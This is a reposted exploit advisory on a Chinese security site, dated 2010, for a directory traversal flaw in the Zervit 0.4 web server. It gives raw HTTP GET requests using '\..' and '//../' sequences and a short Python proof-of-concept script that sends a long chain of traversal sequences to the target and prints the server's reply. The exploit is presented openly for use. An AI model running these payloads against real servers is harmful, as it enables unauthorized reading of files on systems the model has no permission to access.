首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zervit version 0.4 suffers from a directory traversal vulnerability
来源:john.leitch5[at]gmail.com 作者:Leitch 发布时间:2010-05-13   
#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Directory Traversal                                                               #
# Software.................Zervit 0.4                                                                        #
# Download.................http://sourceforge.net/projects/zervit/                                           #
# Date.....................5/11/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially        #
# crafted HTTP request. The resource path must be relative and the slashes unencoded.                        #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# GET /\../ HTTP/1.1                                                                                         #
# Host: localhost                                                                                            #
#                                                                                                            #
# or                                                                                                         #
#                                                                                                            #
# GET //../ HTTP/1.1                                                                                         #
# Host: localhost                                                                                            #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
import sys, struct, socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n')

while 1:
    response = s.recv(8192)
    if not response: break
    print response

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PolyPager 1.0rc10 (fckeditor)
·Apple Safari 4.0.5 parent.clos
·Adobe Shockwave Player 11.5.6.
·Microsoft Windows Outlook Expr
·miniwebsvr v0.0.10 Directory T
·WinXP SP2 Fr Download and Exec
·zervit Web Server v0.4 Source
·Hyplay 1.2.0326.1 (.asx) Local
·zervit Web Server v0.4 Directo
·Netvidade engine v1.0 Multiple
·Xitami / 5.0a0 Denial Of Servi
·Dolphin 2.0 (.elf) Local Danie
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved